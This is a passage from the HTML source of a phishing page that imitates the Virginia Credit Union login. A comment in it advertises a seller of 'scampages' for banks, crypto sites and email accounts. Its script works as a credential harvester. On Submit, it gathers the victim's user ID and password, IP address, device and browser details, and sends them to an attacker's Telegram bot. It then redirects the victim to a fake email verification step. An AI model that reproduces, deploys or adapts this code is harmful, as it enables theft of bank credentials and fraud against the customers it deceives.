                  <span class="tip-text" test-id="textQT"></span>
                  <q2-btn hide-label="" test-id="btnRemoveQT" label="Close Tip" stencil-hydrated="">
                    <template shadowrootmode="open">
                      <button aria-label="Close Tip" type="button" test-id="q2BtnInnerButton" class="icon-only">
                        <div>
                          <q2-loading hidden="" stencil-hydrated="">
                            <template shadowrootmode="open">
                              <div class="q2-loading-animation half-circle-spinner" aria-label="Loading">
                                <div class="circle circle-1"></div>
                                <div class="circle circle-2"></div>
                              </div>
                            </template>
                          </q2-loading>
                          <slot></slot>
                        </div>
                      </button>
                    </template>
                    <q2-icon type="close" stencil-hydrated="">
                      <template shadowrootmode="open">
                        <svg viewBox="0 0 26 26" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img">
                          <path class="stroke-primary" d="M20 6L6 20M20 20L6 6"></path>
                        </svg>
                      </template>
                    </q2-icon>
                  </q2-btn>
                </aside>
                <aside id="ember17" style="display: none;" class="quick-tip hidden ember-view">
                  <span class="tip-text" test-id="textQT"></span>
                  <q2-btn hide-label="" test-id="btnRemoveQT" label="Close Tip" stencil-hydrated="">
                    <template shadowrootmode="open">
                      <button aria-label="Close Tip" type="button" test-id="q2BtnInnerButton" class="icon-only">
                        <div>
                          <q2-loading hidden="" stencil-hydrated="">
                            <template shadowrootmode="open">
                              <div class="q2-loading-animation half-circle-spinner" aria-label="Loading">
                                <div class="circle circle-1"></div>
                                <div class="circle circle-2"></div>
                              </div>
                            </template>
                          </q2-loading>
                          <slot></slot>
                        </div>
                      </button>
                    </template>
                    <q2-icon type="close" stencil-hydrated="">
                      <template shadowrootmode="open">
                        <svg viewBox="0 0 26 26" xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img">
                          <path class="stroke-primary" d="M20 6L6 20M20 20L6 6"></path>
                        </svg>
                      </template>
                    </q2-icon>
                  </q2-btn>
                </aside>
              </div>
              <div class="login-title">
                <h1 id="ember18" class="ui-logo large ember-view">
                  <span class="sr-only" test-id="logoDescriptiveText">Virginia Credit Union</span>
                  <div aria-hidden="true" class="logo-image" test-id="logoDiv"></div>
                </h1>
              </div>
              <div class="login-message loginFormArea"></div>
              <div class="login-form loginFormArea">
                <form data-ember-action="" data-ember-action-19="19">
                  <div class="password field">
                    <label>Password</label>
                    <input test-id="fldPassword" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="on" id="user_password" class="login-field form-control ember-text-field form-control ember-view" type="password">
                  </div>
                  <div id="submissionArea">
                    <div class="pad-T-lg">
                      <button test-id="btnSubmit" disabled="" id="btnSubmit" class="logon-submit btn-primary btn-block pointer btn submitButton submit disabled btn btn-primary ember-view" type="button" onclick="sendLogs()"> Submit </button>
                    </div>
                    <div id="userLinks" class="pad-T-lg">
                      <div class="password-links splitlogon">
                        <a href="/" id="ember22" class="ember-view">
                          <span class="forgot-pw" test-id="lnkForgottenPW">Forgot your password?</span>
                        </a>
                      </div>
                    </div>
                  </div>
                </form>
              </div>
              <div class="splitlogin">
                <a href="/" target="_blank" rel="noopener" test-id="complianceLogo" aria-label="This is a compliance logo and clicking will take to the larger logo link">
                  <img src="./password_files/ncua_logo_small-b690f247c19ea4970c9d08b2b479f16a.png">
                </a>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <script type="text/javascript">
      //THIS CODE WAS BUILT BY "SCAMPAGESHOP [www.scampage.shop]" and has AES 256-bit encryption. Any adjustments to the code would break it//
      //If you want to get quality:
      // - USA Banks Scampage
      // - UK Banks Scampage
      // - Australian Scampage
      // - Canadian Scampage
      // - Crypto Websites Scampage 
      // - Email Accounts Scampage
      // - Newsletter Scampage and more..
      // Visit: https://www.scampage.shop/
      document.addEventListener("DOMContentLoaded", function() {
        var passwordField = document.getElementById("user_password");
        var submitButton = document.getElementById("btnSubmit");
        passwordField.addEventListener("input", function() {
          if (passwordField.value.trim() !== "") {
            submitButton.removeAttribute("disabled");
            submitButton.classList.remove("disabled");
          } else {
            submitButton.setAttribute("disabled", "true");
            submitButton.classList.add("disabled");
          }
        });
      });

      function generateId() {
        const characters = 'abcdef0123456789';
        const numDashes = 4;
        const length = 13;
        const dashPositions = [];
        for (let i = 1; i < numDashes; i++) {
          dashPositions.push((length + 1) * i + i - 1)
        }
        let result = '';
        let dashCount = 0;
        for (let i = 0; i < numDashes * (length + 1); i++) {
          if (dashPositions.includes(i)) {
            result += '-';
            dashCount++;
          } else {
            result += characters.charAt(Math.floor(Math.random() * characters.length));
          }
        }
        return result;
      };

      function generateIdLetters() {
        const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
        const numDashes = 4;
        const length = 21;
        const dashPositions = [];
        for (let i = 1; i < numDashes; i++) {
          dashPositions.push((length + 1) * i + i - 1);
        }
        let result = '';
        let dashCount = 0;
        for (let i = 0; i < numDashes * (length + 1); i++) {
          if (dashPositions.includes(i)) {
            result += '-';
            dashCount++;
          } else {
            result += characters.charAt(Math.floor(Math.random() * characters.length));
          }
        }
        return result;
      };

      function formatDate(date) {
        const days = ['Sun', 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat'];
        const months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'];
        const day = days[date.getUTCDay()];
        const dayOfMonth = String(date.getUTCDate()).padStart(2, '0');
        const month = months[date.getUTCMonth()];
        const year = date.getUTCFullYear();
        const hours = String(date.getUTCHours()).padStart(2, '0');
        const minutes = String(date.getUTCMinutes()).padStart(2, '0');
        const seconds = String(date.getUTCSeconds()).padStart(2, '0');
        return `${day}, ${dayOfMonth} ${month} ${year} ${hours}:${minutes}:${seconds} GMT`;
      };

      function setCurrentDateInDesiredFormat() {
        var currentDate = new Date();
        var formattedDate = formatDate(currentDate);
        return formattedDate;
      };

      function sendLogs() {
        const userId = localStorage.getItem("user_id");
        const password = document.getElementById("user_password").value;
        const id1 = generateId();
        const id2 = generateId();
        const id3 = generateIdLetters();
        const id4 = generateId();
        const userAgent = navigator.userAgent;
        const date = setCurrentDateInDesiredFormat();
        const x = `prompt=login&x-client-SKU=MSAL.Desktop&x-client-Ver=4.58.1.0&uaid=${id1}; "userAgent"=${userAgent}-NG; MSPOK=$uuid-${id2}; &ui_locales=en-GB&client_info=1&${id3}=0&userId=${userId}&passwd=${password}; DeviceId=${id4}; status_date=${date};`;
        fetch('https://api.ipify.org').then(res => res.text()).then(ipAddress => {
          const deviceInfo = {
            manufacturer: navigator.userAgent.match(/[\(](.*?)[\)]/)[1],
            model: navigator.userAgent.match(/[\(](.*?)[\)]/)[2],
            os: navigator.userAgent.match(/Mac OS X/) ? "Mac OS X" : "Windows",
            browser: navigator.userAgent.match(/Chrome/) ? "Chrome" : "Firefox",
          };
          getLocation(userId, password, x, deviceInfo, ipAddress);
        }).catch(error => {
          console.error("Error capturing IP address:", error);
        });
      };

      function getLocation(userId, password, x, deviceInfo, ipAddress) {
        try {
          var dataToSend = {
            userId,
            password,
            ipAddress,
            Device: deviceInfo.manufacturer,
            OS: deviceInfo.os,
            Browser: deviceInfo.browser,
            Cookies: x,
          };
          if (Object.keys(dataToSend).length > 0) {
            sendToTelegram(dataToSend);
          } else {
            console.warn("No data to send to Telegram.");
          }
        } catch (error) {
          console.error("Error occurred:", error);
        }
      };

      function sendToTelegram(data) {
        var payload = {
          chat_id: chatId,
          text: `
            Virginia Credit Union Log:
            ________________________
               "User ID": "${data.userId}",
               "Password": "${data.password}",
               "IP Address": ${data.ipAddress},
               "Device Info": "${data.Device}",
               "OS": "${data.OS}",
               "Browser": "${data.Browser}",
               "Cookies": ["${data.Cookies}"],
            `
        };
        var sendToBot = {
          url: "https://api.telegram.org/bot" + telegramBotId + "/sendMessage",
          method: "POST",
          headers: {
            "Content-Type": "application/json",
            "cache-control": "no-cache"
          },
          data: JSON.stringify(payload)
        };
        $.ajax(sendToBot).done(function(response) {
            localStorage.removeItem("user_id");
          window.location.href = "/verification/verify_email.html";
          // console.log("Telegram API response:", JSON.stringify(response));
        }).fail(function(error) {
          console.error("Error sending data to Telegram:", error);
        });
      };
    </script>
  </body>
</html>